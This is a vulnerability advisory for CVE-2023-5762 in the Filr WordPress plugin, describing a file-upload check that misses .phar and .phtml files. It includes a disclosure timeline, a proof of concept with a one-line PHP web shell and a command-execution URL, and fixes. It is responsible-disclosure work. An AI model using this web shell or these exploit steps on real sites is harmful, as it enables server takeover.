During the testing of the plugin, an RCE (Remote Code Execution) vulnerability was identified, which allows the operating system to execute commands and fully compromise the server on behalf of a user with Author-level privileges. This vulnerability is considered highly critical and poses a significant threat. It stems from the fact that the action=upload_file mechanism checks for files with a .php extension but fails to detect files with .phar or .phtml extensions. This oversight opens the door for an attacker to upload and execute malicious files with .phar or .phtml
Main info:
| CVE | CVE-2023-5762 |
| Plugin | Filr – Secure document library |
| Critical | Super High |
| All Time | 14 999 |
| Active installations | 800+ |
| Publicly Published | November 28, 2023 |
| Last Updated | November 28, 2023 |
| Researcher | Dmtirii Ignatyev |
| OWASP TOP-10 | A1: Injection |
| PoC | Yes |
| Exploit | Will be later |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5762 https://wpscan.com/vulnerability/6ad99725-eccc-4b61-bce2-668b62619deb/ |
| Plugin Security Certification by CleanTalk |  |
Timeline
| November 8, 2023 | Plugin testing and vulnerability detection in the Filr – Secure document library plugin have been completed |
| November 8, 2023 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| November 20, 2023 | The author fixed the vulnerability and released the plugin update |
| November 22, 2023 | Registered CVE-2023-5762 |
Discovery of the Vulnerability
In the course of examining the Filr – Secure Document Library plugin, a critical Remote Code Execution (RCE) vulnerability was unearthed during testing. This flaw allows an attacker to execute arbitrary commands on the server, potentially leading to a full compromise of the system. The vulnerability was identified in the plugin’s file upload mechanism, specifically in the action=upload_file process.
Understanding of RCE attack’s
Remote Code Execution (RCE) is a severe security vulnerability that permits an attacker to execute commands on a target system from a remote location. In WordPress, an RCE vulnerability can have devastating consequences, as it allows an attacker to execute arbitrary code, compromising the integrity and security of the entire system.
In the case of the Filr plugin, the vulnerability is linked to the upload_file action. The mechanism wrongly restricts file checks to those with a .php extension but fails to detect files with .phar or .phtml extensions. This oversight creates an avenue for an attacker to upload and subsequently execute malicious files with .phar or .phtml extensions.
Exploiting the RCE Vulnerability
Exploiting this RCE vulnerability involves leveraging the file upload functionality of the plugin to upload a malicious file with a .phar or .phtml extension. Once the malicious file is uploaded, an attacker could then trigger its execution, leading to the execution of arbitrary code on the server.
POC:
1) Go to main dashboard of plugin http://your_site/wordpress/wp-admin/edit.php?post_type=filr
2) Add new File
3) Upload file with extention “phar” and malicious code inside, like <?php system($_GET[‘cmd]’); ?>
4) Go to http://your_site/wordpress/wp-content/uploads/filr/{number_of_post}/cmd.phar?cmd=ps+aux (or pwd or id) and do RCE
___
The potential risks associated with this RCE vulnerability are substantial. An attacker with Author-level privileges could exploit this flaw to execute arbitrary commands, potentially compromising the entire server. Real-world scenarios could include the upload and execution of a PHP archive (.phar) or PHP hypertext preprocessor (.phtml) file, allowing the attacker to execute commands and manipulate the server environment.
Recommendations for Improved Security
To enhance the security of the Filr plugin and mitigate the risk associated with this RCE vulnerability, the following measures are recommended:
- Patch and Update: Ensure that the plugin is updated to the latest version with security patches.
- Input Validation: Implement robust input validation mechanisms, especially in file upload functionalities, to prevent the upload and execution of malicious files.
- File Type Restrictions: Enforce strict restrictions on allowed file types during uploads to minimize the risk of uploading executable files.
- Regular Security Audits: Conduct regular security audits and vulnerability assessments to identify and remediate potential security issues promptly.
By adopting these security measures, WordPress administrators can significantly reduce the risk of exploitation and enhance the overall security posture of their systems.
By taking these measures, the risk of exploitation of this vulnerability can be significantly reduced, enhancing the overall security posture of the WordPress environment.
#WordPressSecurity #RCE #WebsiteSafety #StayProtected #SuperVulnerability
Use CleanTalk solutions to improve the security of your website
DMITRII I.
